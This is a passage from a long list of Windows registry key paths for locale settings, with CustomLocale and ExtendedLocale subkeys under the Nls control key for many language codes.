HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fi-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fi-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hu-HU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hu-HU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\is
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\is
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\is-IS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\is-IS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ja
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ja
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ja-JP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ja-JP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ko
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ko
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ko-KR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ko-KR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nl-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nl-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\no
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\no
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nb-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nb-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pl-PL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pl-PL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pt-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pt-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rm-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rm-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ro
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ro
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ro-RO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ro-RO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ru
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ru
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ru-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ru-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hr-HR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hr-HR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sk-SK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sk-SK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sq-AL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sq-AL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sv-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sv-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\th
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\th
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\th-TH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\th-TH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tr-TR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tr-TR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\id
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\id
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\id-ID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\id-ID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uk-UA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uk-UA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\be
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\be
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\be-BY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\be-BY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sl-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sl-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\et
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\et
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\et-EE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\et-EE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lv-LV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lv-LV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lt-LT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lt-LT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\vi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\vi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\vi-VN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\vi-VN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hy-AM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hy-AM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\eu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\eu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\eu-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\eu-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mk-MK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mk-MK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tn-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tn-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\xh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\xh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\xh-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\xh-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zu-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zu-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\af
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\af
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\af-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\af-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ka
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ka
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ka-GE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ka-GE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fo-FO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fo-FO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hi-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hi-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mt-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mt-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ga
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ga
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ga-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ga-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ms-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ms-MY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kk-KZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kk-KZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ky
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ky
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ky-KG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ky-KG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sw-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sw-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tk
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tk-TM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tk-TM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tt
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tt-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tt-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gu-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gu-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\or
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\or
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\or-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\or-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ta
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ta
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ta-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ta-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\te
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\te
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\te-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\te-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ml
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ml
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ml-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ml-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\as
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\as
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\as-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\as-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mr-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mr-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-MN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-MN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bo-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bo-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cy-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cy-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\km
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\km
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\km-KH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\km-KH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lo-LA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lo-LA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gl-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gl-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kok
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kok
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kok-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kok-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\syr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\syr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\syr-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\syr-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\si
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\si
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\si-LK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\si-LK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\am
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\am
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\am-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\am-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tzm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tzm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ne
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ne
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ne-NP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ne-NP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fy
